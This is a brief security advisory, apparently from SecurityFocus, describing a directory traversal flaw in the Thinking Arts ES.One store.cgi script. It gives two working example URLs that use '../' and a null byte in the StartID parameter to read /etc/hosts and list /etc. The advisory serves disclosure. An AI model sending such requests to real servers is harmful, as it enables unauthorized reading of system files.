Thinking Arts ES.One Directory Traversal Vulnerability

The following example has been provided by <slipy@b10z.net>:

http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html

^^ = Will obviously open the hosts file.

http://target/cgi-bin/store.cgi?StartID=../etc/%00.html

^^ = Will obviously list the /etc/ directory.


 

Privacy Statement
Copyright 2010, SecurityFocus